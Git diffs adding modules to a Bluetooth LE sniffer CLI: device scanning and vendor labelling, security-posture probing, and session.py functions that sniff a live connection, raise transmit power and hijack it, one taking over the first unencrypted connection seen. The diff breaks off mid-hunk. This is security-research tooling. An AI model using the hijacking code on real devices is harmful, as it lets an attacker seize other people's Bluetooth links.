+            self.encrypted = True
+
+    def note_smp(self, smp_pdu):
+        if not smp_pdu:
+            return
+        code = smp_pdu[0]
+        if code in (SMP_PAIRING_REQ, SMP_PAIRING_RSP) and len(smp_pdu) >= 4:
+            authreq = smp_pdu[3]
+            self.mitm = bool(authreq & AUTHREQ_MITM)
+            self.lesc = bool(authreq & AUTHREQ_SC)
+            self.encrypted = True
+
+    def note_att_error(self, code):
+        if code in (0x05, 0x0F):  # Insufficient Authentication / Encryption
+            self.protected_read = True
+
+    def tag(self):
+        if self.lesc is True: return "LESC"
+        if self.lesc is False: return "LEGACY"
+        return ""
+
+    def verdict(self):
+        if self.encrypted or self.protected_read:
+            if self.mitm is True: return "ENCRYPTED_MITM"
+            if self.mitm is False: return "ENCRYPTED_JUSTWORKS"
+            return "ENCRYPTED_UNKNOWN"
+        if self.saw_plaintext_att:
+            return "OPEN"
+        return "UNKNOWN"

--- a/python_cli/sniffle/recon.py
+++ b/python_cli/sniffle/recon.py
@@ -1,0 +1,420 @@
+"""
+recon.py — BLE passive scan + optional active posture classification.
+
+Public API
+----------
+Device          dataclass representing one observed BLE advertiser
+scan()          run an active scan, return list[Device]
+probe()         connect to one Device and classify its security posture
+mac_to_list()   convert "AA:BB:CC:DD:EE:FF" → little-endian 6-byte list
+parse_adv_data()  extract (name, service_uuids) from raw AD bytes
+render_scan_table()  pretty-print a sorted table of Device objects
+"""
+
+from __future__ import annotations
+
+import time
+from dataclasses import dataclass, field
+from struct import unpack
+from typing import List
+
+from .advdata.decoder import decode_adv_data
+from .advdata.ad_types import (
+    ShortenedLocalNameRecord,
+    CompleteLocalNameRecord,
+    ServiceList16Record,
+    ManufacturerSpecificDataRecord,
+)
+from .advdata.msd_apple import AppleMSDRecord, apple_message_types
+from .advdata.msd_microsoft import MicrosoftMSDRecord
+from .advdata.constants import company_identifiers
+from .central_link import ATTError, LinkLost
+from .gatt import GattClient
+from .packet_decoder import (
+    AdvaMessage,
+    AdvIndMessage,
+    AdvDirectIndMessage,
+    AdvExtIndMessage,
+    ScanRspMessage,
+    AuxScanRspMessage,
+    AdvertMessage,
+    PacketMessage,
+    str_mac,
+    str_mac2,
+    _str_atype,
+)
+from .posture import Posture
+from .session import connect_session
+from .sniffle_hw import SnifferMode
+from .errors import SourceDone
+
+
+# ---------------------------------------------------------------------------
+# Data model
+# ---------------------------------------------------------------------------
+
+@dataclass
+class Device:
+    mac: str                          # "AA:BB:CC:DD:EE:FF"
+    name: str = ""
+    rssi: int = 0
+    addr_type: str = ""               # "Public" / "Random" / "RPA" / "Static" / "NRPA"
+    services: list = field(default_factory=list)   # advertised 16-bit service UUIDs (ints)
+    posture: str = "UNKNOWN"
+    connectable: bool = True          # did we see a connectable advertisement?
+                                      # default True so a synthetic Device built
+                                      # from a CLI MAC is still connect-attempted.
+    vendor: str = ""                  # best-effort vendor/type label from MSD
+                                      # (e.g. "Apple Find My", "Microsoft", "Samsung")
+
+
+# ---------------------------------------------------------------------------
+# Pure-logic helpers
+# ---------------------------------------------------------------------------
+
+def mac_to_list(mac_str: str) -> List[int]:
+    """Convert 'AA:BB:CC:DD:EE:FF' to a little-endian 6-byte list [0xFF, 0xEE, ..., 0xAA]."""
+    parts = mac_str.upper().split(":")
+    return [int(b, 16) for b in reversed(parts)]
+
+
+def _name_and_services(records):
+    """Extract (name, services) from already-decoded adv records.
+    Complete Local Name (0x09) takes precedence over Shortened (0x08)."""
+    name = ""
+    shortened = ""
+    services = []
+    for rec in records:
+        if isinstance(rec, CompleteLocalNameRecord):
+            name = rec.name
+        elif isinstance(rec, ShortenedLocalNameRecord):
+            shortened = rec.name
+        elif isinstance(rec, ServiceList16Record):
+            services.extend(rec.services)
+    return (name if name else shortened), services
+
+
+def _vendor_label(records) -> str:
+    """Vendor / device-type label from Manufacturer Specific Data.
+
+    Apple Continuity → "Apple <message type(s)>" (e.g. "Apple Find My"); Microsoft
+    CDP → "Microsoft <device type>"; any other company → its assigned-numbers
+    name, or "0x%04X" if unknown. "" when there is no MSD. The Apple/MS subclasses
+    are checked before the generic record since they derive from it.
+    """
+    for rec in records:
+        if isinstance(rec, AppleMSDRecord):
+            types = []
+            for m in rec.messages:
+                nm = apple_message_types.get(m.msg_type)
+                if nm and nm not in types:
+                    types.append(nm)
+            return "Apple" + ((" " + "/".join(types[:2])) if types else "")
+        if isinstance(rec, MicrosoftMSDRecord):
+            try:
+                return "Microsoft " + rec.str_device_type()
+            except Exception:
+                return "Microsoft"
+        if isinstance(rec, ManufacturerSpecificDataRecord):
+            return company_identifiers.get(rec.company, "0x%04X" % rec.company)
+    return ""
+
+
+def parse_adv_data(data: bytes):
+    """Parse raw BLE advertisement data bytes.
+
+    Returns (name: str, services: list[int]) where services contains 16-bit UUIDs.
+    Complete Local Name (0x09) takes precedence over Shortened (0x08).
+    """
+    return _name_and_services(decode_adv_data(data))
+
+
+def vendor_from_adv_data(data: bytes) -> str:
+    """Return a short vendor/type label for raw advertisement data (see
+    _vendor_label), or "" when no Manufacturer Specific Data is present."""
+    return _vendor_label(decode_adv_data(data))
+
+
+# ---------------------------------------------------------------------------
+# Scan
+# ---------------------------------------------------------------------------
+
+def _is_connectable(dpkt) -> bool:
+    """True if this advertisement invites a connection.
+
+    Connectable: ADV_IND, ADV_DIRECT_IND, and extended adverts whose AdvMode is
+    "Connectable" (==1). Non-connectable beacons (ADV_NONCONN_IND / ADV_SCAN_IND)
+    and bare scan responses are False — initiating to them only ever times out.
+    """
+    if isinstance(dpkt, (AdvIndMessage, AdvDirectIndMessage)):
+        return True
+    if isinstance(dpkt, AdvExtIndMessage):
+        return getattr(dpkt, "AdvMode", 0) == 1
+    return False
+
+
+def _ingest_into(dpkt, seen: dict, best_rssi: dict) -> None:
+    """Ingest one advertisement packet into *seen* / *best_rssi* dicts (mutates both).
+
+    seen      : mac_str -> Device
+    best_rssi : mac_str -> int (best RSSI seen so far for this MAC)
+    """
+    adv_a = tx_add = None
+    if isinstance(dpkt, (AdvaMessage, ScanRspMessage, AuxScanRspMessage,
+                         AdvDirectIndMessage)):
+        adv_a, tx_add = dpkt.AdvA, dpkt.TxAdd
+    elif isinstance(dpkt, AdvExtIndMessage) and dpkt.AdvA is not None:
+        adv_a, tx_add = dpkt.AdvA, dpkt.TxAdd
+    else:
+        return
+    if not any(adv_a):     # malformed advert with an all-zero address — drop it
+        return
+    pkt_connectable = _is_connectable(dpkt)
+    mac_str = str_mac(adv_a)
+    rssi = dpkt.rssi
+    if mac_str not in seen:
+        seen[mac_str] = Device(mac=mac_str, addr_type=_str_atype(adv_a, bool(tx_add)),
+                               connectable=pkt_connectable)
+        best_rssi[mac_str] = rssi
+    dev = seen[mac_str]
+    # Sticky: once any connectable PDU is seen for this MAC, keep it connectable
+    # (a later non-connectable SCAN_RSP must not clear the flag).
+    if pkt_connectable:
+        dev.connectable = True
+    if rssi > best_rssi[mac_str]:
+        best_rssi[mac_str] = rssi
+        dev.rssi = rssi
+    elif dev.rssi == 0:
+        dev.rssi = rssi
+    adv_data = getattr(dpkt, "adv_data", b"")
+    if adv_data:
+        records = decode_adv_data(bytes(adv_data))
+        pkt_name, pkt_svcs = _name_and_services(records)
+        if pkt_name and (not dev.name or isinstance(dpkt, (ScanRspMessage, AuxScanRspMessage))):
+            dev.name = pkt_name
+        for svc in pkt_svcs:
+            if svc not in dev.services:
+                dev.services.append(svc)
+        pkt_vendor = _vendor_label(records)
+        if pkt_vendor and not dev.vendor:
+            dev.vendor = pkt_vendor
+
+
+def _scan_channel(hw, ch: int, duration: float, seen: dict, best_rssi: dict) -> List[Device]:
+    """Scan one channel for *duration* seconds, ingesting adverts into seen/best_rssi.
+
+    Returns the list of Devices that were FIRST seen during this call (new this round).
+    *seen* and *best_rssi* are mutated in place so state accumulates across channels.
+    """
+    new: List[Device] = []
+    hw.setup_sniffer(mode=SnifferMode.ACTIVE_SCAN, chan=ch,
+                     ext_adv=True, coded_phy=False, rssi_min=-128)
+    hw.mark_and_flush()
+    deadline = time.time() + duration
+    while time.time() < deadline:
+        try:
+            msg = hw.recv_and_decode()
+        except SourceDone:
+            break
+        except Exception:
+            continue
+        if isinstance(msg, AdvertMessage):
+            before = set(seen)
+            _ingest_into(msg, seen, best_rssi)
+            added = set(seen) - before
+            for mac in added:
+                new.append(seen[mac])
+    try:
+        hw.setup_sniffer()   # stop scanning
+    except Exception:
+        pass
+    return new
+
+
+def scan(hw, advchan=None, duration: float = 10.0) -> List[Device]:
+    """Run an active BLE scan for *duration* seconds.
+
+    If *advchan* is None (default), sweep all three primary advertising channels
+    37/38/39, scanning each for the FULL *duration* (so devices that only
+    advertise on 38 or 39 are still found, with no loss of dwell time on any one
+    channel — total wall time is 3*duration). If a specific channel is given,
+    scan only that one for *duration*. One Device per unique MAC, merged across
+    channels; strongest RSSI wins; latest name/services retained.
+
+    Returns list[Device] unsorted (use render_scan_table for sorted output).
+    """
+    channels = [advchan] if advchan else [37, 38, 39]
+    per = duration   # full dwell on each channel, not a split budget
+
+    seen: dict = {}        # mac_str -> Device
+    best_rssi: dict = {}   # mac_str -> int
+
+    for ch in channels:
+        _scan_channel(hw, ch, per, seen, best_rssi)
+
+    for mac_str, dev in seen.items():
+        dev.rssi = best_rssi[mac_str]
+    return list(seen.values())
+
+
+def scan_and_audit(hw, advchan=None, duration: float = 5.0, aggressive: bool = False,
+                   include_private: bool = True, on_discover=None, on_result=None):
+    """Audit-on-discovery: scan each channel and audit the devices newly seen on
+    that channel immediately (fresh address), before moving on.
+
+    Every newly discovered advertiser is passed to audit_device. Non-connectable
+    advertisers (beacons) are reported as such without a connection attempt — only
+    connectable devices are actually connected to and GATT-enumerated. If
+    *include_private* is False, only Public/Static addresses are considered
+    (RPA/NRPA skipped).
+
+    *on_discover(device)* is called when a device is first seen.
+    *on_result(device, findings)* is called after a device is audited.
+
+    Returns list[(Device, findings)].
+    """
+    from .audit import audit_device   # local import: audit imports recon (avoid cycle)
+    channels = [advchan] if advchan else [37, 38, 39]
+    seen: dict = {}
+    best_rssi: dict = {}
+    results = []
+    audited: set = set()
+    for ch in channels:
+        for dev in _scan_channel(hw, ch, duration, seen, best_rssi):
+            if dev.mac in audited:
+                continue
+            if not include_private and dev.addr_type not in ("Public", "Static"):
+                continue
+            audited.add(dev.mac)
+            if on_discover:
+                on_discover(dev)
+            findings = audit_device(hw, dev, aggressive=aggressive)
+            results.append((dev, findings))
+            if on_result:
+                on_result(dev, findings)
+    return results
+
+
+# ---------------------------------------------------------------------------
+# Probe
+# ---------------------------------------------------------------------------
+
+def probe(hw, device: Device, timeout: float = 4.0) -> str:
+    """Actively connect to *device* and classify its security posture.
+
+    Attempts GattClient(link).read(0x0003) — the GAP Device Name attribute.
+    - Success              → posture from p.verdict() or "OPEN"
+    - ATTError code 0x05 or 0x0F → note it in posture → "ENCRYPTED_*"
+    - LinkLost / TimeoutError / RuntimeError → "UNKNOWN"
+
+    Always tears down the link and resets the hw before returning.
+    """
+    is_random = device.addr_type != "Public"
+    peer_mac = mac_to_list(device.mac)
+    p = Posture()
+
+    link = None
+    try:
+        link = connect_session(hw, peer_mac, is_random=is_random, posture=p, timeout=timeout)
+        gc = GattClient(link)
+        try:
+            gc.read(0x0003)      # GAP Device Name handle
+            # Successful plain read → open (no encryption needed)
+            p.saw_plaintext_att = True
+        except ATTError as e:
+            if e.code in (0x05, 0x0F):
+                p.note_att_error(e.code)
+            # else: some other ATT error — not conclusive, fall through
+        verdict = p.verdict()
+        return verdict if verdict != "UNKNOWN" else "OPEN"
+    except (LinkLost, TimeoutError, RuntimeError):
+        return "UNKNOWN"
+    except Exception:
+        return "UNKNOWN"
+    finally:
+        if link is not None:
+            try:
+                link.close()
+            except Exception:
+                pass
+        try:
+            hw.cmd_reset()
+        except Exception:
+            pass
+
+
+# ---------------------------------------------------------------------------
+# Rendering
+# ---------------------------------------------------------------------------
+
+# ANSI codes
+_RESET = "\033[0m"
+_BOLD = "\033[1m"
+_DIM = "\033[2m"
+
+
+def _row_color(text: str, connectable: bool, color: bool) -> str:
+    """Bold a connectable device (it's attack surface); dim a non-connectable
+    beacon — so connectable vs non-connectable is easy to spot at a glance."""
+    if not color:
+        return text
+    return (_BOLD if connectable else _DIM) + text + _RESET
+
+
+def render_scan_table(devices: List[Device], color: bool = True) -> str:
+    """Return a formatted table string of scanned devices.
+
+    Columns: MAC · Name · Vendor · RSSI · AddrType · Conn · #Svcs
+    Name is the advertised device name (often empty for privacy beacons); Vendor
+    is the manufacturer/type label from Manufacturer Specific Data (e.g. "Apple
+    Find My") — they are separate columns. Rows are sorted connectable-first, then
+    by strongest RSSI; connectable rows are bold and non-connectable beacons dim.
+    """
+    # connectable-first (False sorts before True), then strongest RSSI first
+    sorted_devs = sorted(devices, key=lambda d: (not d.connectable, -d.rssi))
+
+    col_widths = {
+        "mac":      17,
+        "name":     16,
+        "vendor":   24,
+        "rssi":      5,
+        "addr_type": 8,
+        "conn":      4,
+        "svcs":      5,
+    }
+
+    def _fit(s, w):
+        return (s[:w - 2] + "..") if len(s) > w else s
+
+    sep = "  "
+    header = (
+        "MAC".ljust(col_widths["mac"]) + sep +
+        "Name".ljust(col_widths["name"]) + sep +
+        "Vendor".ljust(col_widths["vendor"]) + sep +
+        "RSSI".rjust(col_widths["rssi"]) + sep +
+        "AddrType".ljust(col_widths["addr_type"]) + sep +
+        "Conn".ljust(col_widths["conn"]) + sep +
+        "#Svcs"
+    )
+    divider = "-" * len(header)
+
+    lines = [header, divider]
+
+    for dev in sorted_devs:
+        row = (
+            dev.mac.ljust(col_widths["mac"]) + sep +
+            _fit(dev.name or "", col_widths["name"]).ljust(col_widths["name"]) + sep +
+            _fit(dev.vendor or "", col_widths["vendor"]).ljust(col_widths["vendor"]) + sep +
+            str(dev.rssi).rjust(col_widths["rssi"]) + sep +
+            dev.addr_type.ljust(col_widths["addr_type"]) + sep +
+            ("Y" if dev.connectable else "N").ljust(col_widths["conn"]) + sep +
+            str(len(dev.services))
+        )
+        lines.append(_row_color(row, dev.connectable, color))
+
+    lines.append(divider)
+    lines.append(
+        "Legend: Conn Y = connectable (attack surface), N = non-connectable beacon."
+    )
+
+    return "\n".join(lines)

--- a/python_cli/sniffle/recon.py
+++ b/python_cli/sniffle/recon.py
@@ -1,12 +1,12 @@
 """
-recon.py — BLE passive scan + optional active posture classification.
+recon.py - BLE passive scan + optional active posture classification.
 
 Public API
 ----------
 Device          dataclass representing one observed BLE advertiser
 scan()          run an active scan, return list[Device]
 probe()         connect to one Device and classify its security posture
-mac_to_list()   convert "AA:BB:CC:DD:EE:FF" → little-endian 6-byte list
+mac_to_list()   convert "AA:BB:CC:DD:EE:FF" -> little-endian 6-byte list
 parse_adv_data()  extract (name, service_uuids) from raw AD bytes
 render_scan_table()  pretty-print a sorted table of Device objects
 """
@@ -97,8 +97,8 @@ def _name_and_services(records):
 def _vendor_label(records) -> str:
     """Vendor / device-type label from Manufacturer Specific Data.
 
-    Apple Continuity → "Apple <message type(s)>" (e.g. "Apple Find My"); Microsoft
-    CDP → "Microsoft <device type>"; any other company → its assigned-numbers
+    Apple Continuity -> "Apple <message type(s)>" (e.g. "Apple Find My"); Microsoft
+    CDP -> "Microsoft <device type>"; any other company -> its assigned-numbers
     name, or "0x%04X" if unknown. "" when there is no MSD. The Apple/MS subclasses
     are checked before the generic record since they derive from it.
     """
@@ -144,7 +144,7 @@ def _is_connectable(dpkt) -> bool:
 
     Connectable: ADV_IND, ADV_DIRECT_IND, and extended adverts whose AdvMode is
     "Connectable" (==1). Non-connectable beacons (ADV_NONCONN_IND / ADV_SCAN_IND)
-    and bare scan responses are False — initiating to them only ever times out.
+    and bare scan responses are False - initiating to them only ever times out.
     """
     if isinstance(dpkt, (AdvIndMessage, AdvDirectIndMessage)):
         return True
@@ -167,7 +167,7 @@ def _ingest_into(dpkt, seen: dict, best_rssi: dict) -> None:
         adv_a, tx_add = dpkt.AdvA, dpkt.TxAdd
     else:
         return
-    if not any(adv_a):     # malformed advert with an all-zero address — drop it
+    if not any(adv_a):     # malformed advert with an all-zero address - drop it
         return
     pkt_connectable = _is_connectable(dpkt)
     mac_str = str_mac(adv_a)
@@ -237,7 +237,7 @@ def scan(hw, advchan=None, duration: float = 10.0) -> List[Device]:
     If *advchan* is None (default), sweep all three primary advertising channels
     37/38/39, scanning each for the FULL *duration* (so devices that only
     advertise on 38 or 39 are still found, with no loss of dwell time on any one
-    channel — total wall time is 3*duration). If a specific channel is given,
+    channel - total wall time is 3*duration). If a specific channel is given,
     scan only that one for *duration*. One Device per unique MAC, merged across
     channels; strongest RSSI wins; latest name/services retained.
 
@@ -263,7 +263,7 @@ def scan_and_audit(hw, advchan=None, duration: float = 5.0, aggressive: bool = F
     that channel immediately (fresh address), before moving on.
 
     Every newly discovered advertiser is passed to audit_device. Non-connectable
-    advertisers (beacons) are reported as such without a connection attempt — only
+    advertisers (beacons) are reported as such without a connection attempt - only
     connectable devices are actually connected to and GATT-enumerated. If
     *include_private* is False, only Public/Static addresses are considered
     (RPA/NRPA skipped).
@@ -302,10 +302,10 @@ def scan_and_audit(hw, advchan=None, duration: float = 5.0, aggressive: bool = F
 def probe(hw, device: Device, timeout: float = 4.0) -> str:
     """Actively connect to *device* and classify its security posture.
 
-    Attempts GattClient(link).read(0x0003) — the GAP Device Name attribute.
-    - Success              → posture from p.verdict() or "OPEN"
-    - ATTError code 0x05 or 0x0F → note it in posture → "ENCRYPTED_*"
-    - LinkLost / TimeoutError / RuntimeError → "UNKNOWN"
+    Attempts GattClient(link).read(0x0003) - the GAP Device Name attribute.
+    - Success              -> posture from p.verdict() or "OPEN"
+    - ATTError code 0x05 or 0x0F -> note it in posture -> "ENCRYPTED_*"
+    - LinkLost / TimeoutError / RuntimeError -> "UNKNOWN"
 
     Always tears down the link and resets the hw before returning.
     """
@@ -319,12 +319,12 @@ def probe(hw, device: Device, timeout: float = 4.0) -> str:
         gc = GattClient(link)
         try:
             gc.read(0x0003)      # GAP Device Name handle
-            # Successful plain read → open (no encryption needed)
+            # Successful plain read -> open (no encryption needed)
             p.saw_plaintext_att = True
         except ATTError as e:
             if e.code in (0x05, 0x0F):
                 p.note_att_error(e.code)
-            # else: some other ATT error — not conclusive, fall through
+            # else: some other ATT error - not conclusive, fall through
         verdict = p.verdict()
         return verdict if verdict != "UNKNOWN" else "OPEN"
     except (LinkLost, TimeoutError, RuntimeError):
@@ -355,7 +355,7 @@ _DIM = "\033[2m"
 
 def _row_color(text: str, connectable: bool, color: bool) -> str:
     """Bold a connectable device (it's attack surface); dim a non-connectable
-    beacon — so connectable vs non-connectable is easy to spot at a glance."""
+    beacon - so connectable vs non-connectable is easy to spot at a glance."""
     if not color:
         return text
     return (_BOLD if connectable else _DIM) + text + _RESET
@@ -364,10 +364,10 @@ def _row_color(text: str, connectable: bool, color: bool) -> str:
 def render_scan_table(devices: List[Device], color: bool = True) -> str:
     """Return a formatted table string of scanned devices.
 
-    Columns: MAC · Name · Vendor · RSSI · AddrType · Conn · #Svcs
+    Columns: MAC | Name | Vendor | RSSI | AddrType | Conn | #Svcs
     Name is the advertised device name (often empty for privacy beacons); Vendor
     is the manufacturer/type label from Manufacturer Specific Data (e.g. "Apple
-    Find My") — they are separate columns. Rows are sorted connectable-first, then
+    Find My") - they are separate columns. Rows are sorted connectable-first, then
     by strongest RSSI; connectable rows are bold and non-connectable beacons dim.
     """
     # connectable-first (False sorts before True), then strongest RSSI first

--- a/python_cli/sniffle/session.py
+++ b/python_cli/sniffle/session.py
@@ -1,0 +1,190 @@
+"""
+session.py — three entry points that return a live CentralLink:
+
+  connect_session(hw, peer_mac, ...)      – initiate a connection as central
+  hijack_session(hw, target_mac, ...)     – sniff then hijack a specific MAC
+  follow_session(hw, ...)                 – hijack the first connection seen (no MAC filter)
+"""
+
+from time import time
+from serial import SerialTimeoutException
+from .constants import SnifferMode
+from .sniffer_state import StateMessage, SnifferState
+from .packet_decoder import PacketMessage, DPacketMessage, DataMessage
+from .central_link import CentralLink
+from .posture import Posture
+
+
+def _wait_state(hw, target, timeout, sink=None):
+    """Drain hw.recv_and_decode() until a StateMessage with new_state==target arrives,
+    or until timeout seconds have elapsed.  Returns True on success, False on timeout.
+    An optional sink callable is called with every received message."""
+    deadline = time() + timeout
+    while time() < deadline:
+        try:
+            msg = hw.recv_and_decode()
+        except SerialTimeoutException:
+            continue  # no data this interval — re-check the deadline
+        if sink:
+            sink(msg)
+        if isinstance(msg, StateMessage) and msg.new_state == target:
+            return True
+    return False
+
+
+def connect_session(hw, peer_mac, is_random=True, posture=None, timeout=10, **kw):
+    """Initiate a BLE connection to peer_mac and return a live CentralLink.
+
+    peer_mac: 6-byte list, little-endian (as produced by parse_mac in hijack_test.py,
+              e.g. [0xFF, 0xEE, 0xDD, 0xCC, 0xBB, 0xAA] for AA:BB:CC:DD:EE:FF).
+    is_random: True if the peer uses a random address (default), False for public.
+    posture:   optional Posture instance; one will be created if not supplied.
+
+    Raises RuntimeError if CENTRAL state is not reached within 10 seconds.
+    """
+    posture = posture or Posture()
+    # initiate_conn returns the connection's access address. The host decoder must
+    # be told it, or every data PDU is mis-parsed as an advertisement (the sniffer
+    # never sees a CONNECT_IND when WE initiate). Mirrors initiator.py.
+    aa = hw.initiate_conn(peer_mac, is_random=is_random)
+    hw.mark_and_flush()
+    if not _wait_state(hw, SnifferState.CENTRAL, timeout):
+        raise RuntimeError("failed to reach CENTRAL (connect_session timed out)")
+    # Set the decoder's connection AA only AFTER reaching CENTRAL. During the
+    # INITIATING phase the sniffer hears advertisements on ch >= 37, and the
+    # decoder resets cur_aa back to the advertising AA on those — so an earlier
+    # assignment gets clobbered and every connection data PDU (incl. our ATT
+    # responses) is mis-decoded as an advert, making att_request time out.
+    # Flush first so any advert still buffered from INITIATING is consumed
+    # before we lock in the AA (and before the CentralLink pump starts reading).
+    hw.mark_and_flush()
+    hw.decoder_state.cur_aa = aa
+    return CentralLink(hw, on_control=posture.note_control_opcode, on_smp=posture.note_smp)
+
+
+def hijack_session(hw, target_mac, advchan=37, stabilize_events=20,
+                   tx_power=5, posture=None, **kw):
+    """Sniff for a connection to target_mac, wait for timing to stabilise,
+    then fire cmd_hijack_live() and return a live CentralLink.
+
+    target_mac: 6-byte list, little-endian — the peripheral's MAC.
+    advchan:    primary advertising channel to listen on (37/38/39).
+    stabilize_events: number of C->P connection events to observe before hijacking.
+    tx_power:   TX power in dBm to set before firing the hijack (-20..+5).
+    posture:    optional Posture instance; one will be created if not supplied.
+
+    Raises RuntimeError if any phase times out or if the connection is encrypted.
+    """
+    posture = posture or Posture()
+
+    # target_mac is always truthy here (6-byte list), so hop3=True is safe.
+    hw.setup_sniffer(
+        mode=SnifferMode.CONN_FOLLOW,
+        chan=advchan,
+        targ_mac=target_mac,
+        hop3=True,
+        rssi_min=-128,
+    )
+    hw.cmd_instahop(True)
+    hw.mark_and_flush()
+
+    # Phase 1: wait until the sniffer latches onto the connection (DATA state).
+    if not _wait_state(hw, SnifferState.DATA, 60,
+                       sink=lambda m: _feed_posture(m, posture)):
+        raise RuntimeError("hijack_session: target never connected (DATA state timeout)")
+
+    # Phase 2: accumulate enough connection events for the firmware to have
+    # a stable nextHopTime before firing the hijack.
+    _stabilize(hw, stabilize_events, posture)
+
+    if posture.encrypted:
+        raise RuntimeError(
+            "hijack_session: target connection is encrypted — cannot hijack")
+
+    # Phase 3: boost TX power to outgun the original central, then hijack.
+    hw.cmd_tx_power(tx_power)
+    hw.cmd_hijack_live()
+
+    if not _wait_state(hw, SnifferState.CENTRAL, 10):
+        raise RuntimeError("hijack_session: hijack did not reach CENTRAL state")
+
+    return CentralLink(hw, on_control=posture.note_control_opcode, on_smp=posture.note_smp)
+
+
+def follow_session(hw, advchan=37, **kw):
+    """Hijack the first BLE connection seen on advchan — no MAC filter.
+
+    Internally calls hijack_session with target_mac=None.  Because setup_sniffer
+    rejects hop3=True when no MAC is given, hop3 is forced to False here.
+    """
+    posture = kw.pop('posture', None) or Posture()
+    stabilize_events = kw.pop('stabilize_events', 20)
+    tx_power = kw.pop('tx_power', 5)
+
+    # No MAC filter: cmd_mac() is called with no argument (clears any filter).
+    # hop3 must be False — setup_sniffer raises UsageError if hop3=True and
+    # targ_mac is None.
+    hw.setup_sniffer(
+        mode=SnifferMode.CONN_FOLLOW,
+        chan=advchan,
+        targ_mac=None,
+        hop3=False,
+        rssi_min=-128,
+    )
+    hw.cmd_instahop(True)
+    hw.mark_and_flush()
+
+    if not _wait_state(hw, SnifferState.DATA, 60,
+                       sink=lambda m: _feed_posture(m, posture)):
+        raise RuntimeError("follow_session: no connection seen (DATA state timeout)")
+
+    _stabilize(hw, stabilize_events, posture)
+
+    if posture.encrypted:
+        raise RuntimeError(
+            "follow_session: connection is encrypted — cannot hijack")
+
+    hw.cmd_tx_power(tx_power)
+    hw.cmd_hijack_live()
+
+    if not _wait_state(hw, SnifferState.CENTRAL, 10):
+        raise RuntimeError("follow_session: hijack did not reach CENTRAL state")
+
+    return CentralLink(hw, on_control=posture.note_control_opcode, on_smp=posture.note_smp)
+
+
+# ---------------------------------------------------------------------------
+# Internal helpers
+# ---------------------------------------------------------------------------
+
+def _feed_posture(msg, posture):
+    """Feed a single message into posture during the DATA-state wait phase."""
+    if msg is None:
+        return
+    if isinstance(msg, PacketMessage):
+        # recv_and_decode() already returns DPacketMessage subclasses, but
+        # we accept plain PacketMessage too (returned on decode errors).
+        d = DPacketMessage.decode(msg) if type(msg) is PacketMessage else msg
+        if isinstance(d, DataMessage) and len(d.body) >= 3 and (d.body[0] & 0x3) == 0x3:
+            posture.note_control_opcode(d.body[2])
+
+
+def _stabilize(hw, n, posture):
+    """Count n C->P data packets to confirm the firmware's hop-timing is stable."""
+    count = 0
+    deadline = time() + 30
+    while count < n and time() < deadline:
+        try:
+            msg = hw.recv_and_decode()
+        except SerialTimeoutException:
+            continue  # no data this interval — re-check the deadline
+        if msg is None:
+            continue
+        if isinstance(msg, PacketMessage):
+            d = DPacketMessage.decode(msg) if type(msg) is PacketMessage else msg
+            if isinstance(d, DataMessage):
+                if (d.body[0] & 0x3) == 0x3 and len(d.body) >= 3:
+                    posture.note_control_opcode(d.body[2])
+                if d.data_dir == 0:      # C->P: one new connection event
+                    count += 1
+                posture.saw_plaintext_att = True

--- a/python_cli/sniffle/session.py
+++ b/python_cli/sniffle/session.py
@@ -35,7 +35,7 @@ def _wait_state(hw, target, timeout, sink=None):
 def connect_session(hw, peer_mac, is_random=True, posture=None, timeout=10, **kw):
     """Initiate a BLE connection to peer_mac and return a live CentralLink.
 
-    peer_mac: 6-byte list, little-endian (as produced by parse_mac in hijack_test.py,
+    peer_mac: 6-byte list, little-endian (as produced by parse_mac in hijack_poc.py,
               e.g. [0xFF, 0xEE, 0xDD, 0xCC, 0xBB, 0xAA] for AA:BB:CC:DD:EE:FF).
     is_random: True if the peer uses a random address (default), False for public.
     posture:   optional Posture instance; one will be created if not supplied.

--- a/python_cli/sniffle/session.py
+++ b/python_cli/sniffle/session.py
@@ -1,9 +1,9 @@
 """
-session.py — three entry points that return a live CentralLink:
+session.py - three entry points that return a live CentralLink:
 
-  connect_session(hw, peer_mac, ...)      – initiate a connection as central
-  hijack_session(hw, target_mac, ...)     – sniff then hijack a specific MAC
-  follow_session(hw, ...)                 – hijack the first connection seen (no MAC filter)
+  connect_session(hw, peer_mac, ...)      - initiate a connection as central
+  hijack_session(hw, target_mac, ...)     - sniff then hijack a specific MAC
+  follow_session(hw, ...)                 - hijack the first connection seen (no MAC filter)
 """
 
 from time import time
@@ -24,7 +24,7 @@ def _wait_state(hw, target, timeout, sink=None):
         try:
             msg = hw.recv_and_decode()
         except SerialTimeoutException:
-            continue  # no data this interval — re-check the deadline
+            continue  # no data this interval - re-check the deadline
         if sink:
             sink(msg)
         if isinstance(msg, StateMessage) and msg.new_state == target:
@@ -52,7 +52,7 @@ def connect_session(hw, peer_mac, is_random=True, posture=None, timeout=10, **kw
         raise RuntimeError("failed to reach CENTRAL (connect_session timed out)")
     # Set the decoder's connection AA only AFTER reaching CENTRAL. During the
     # INITIATING phase the sniffer hears advertisements on ch >= 37, and the
-    # decoder resets cur_aa back to the advertising AA on those — so an earlier
+    # decoder resets cur_aa back to the advertising AA on those - so an earlier
     # assignment gets clobbered and every connection data PDU (incl. our ATT
     # responses) is mis-decoded as an advert, making att_request time out.
     # Flush first so any advert still buffered from INITIATING is consumed
@@ -67,7 +67,7 @@ def hijack_session(hw, target_mac, advchan=37, stabilize_events=20,
     """Sniff for a connection to target_mac, wait for timing to stabilise,
     then fire cmd_hijack_live() and return a live CentralLink.
 
-    target_mac: 6-byte list, little-endian — the peripheral's MAC.
+    target_mac: 6-byte list, little-endian - the peripheral's MAC.
     advchan:    primary advertising channel to listen on (37/38/39).
     stabilize_events: number of C->P connection events to observe before hijacking.
     tx_power:   TX power in dBm to set before firing the hijack (-20..+5).
@@ -99,7 +99,7 @@ def hijack_session(hw, target_mac, advchan=37, stabilize_events=20,
 
     if posture.encrypted:
         raise RuntimeError(
-            "hijack_session: target connection is encrypted — cannot hijack")
+            "hijack_session: target connection is encrypted - cannot hijack")
 
     # Phase 3: boost TX power to outgun the original central, then hijack.
     hw.cmd_tx_power(tx_power)
@@ -112,7 +112,7 @@ def hijack_session(hw, target_mac, advchan=37, stabilize_events=20,
 
 
 def follow_session(hw, advchan=37, **kw):
-    """Hijack the first BLE connection seen on advchan — no MAC filter.
+    """Hijack the first BLE connection seen on advchan - no MAC filter.
 
     Internally calls hijack_session with target_mac=None.  Because setup_sniffer
     rejects hop3=True when no MAC is given, hop3 is forced to False here.
@@ -122,7 +122,7 @@ def follow_session(hw, advchan=37, **kw):
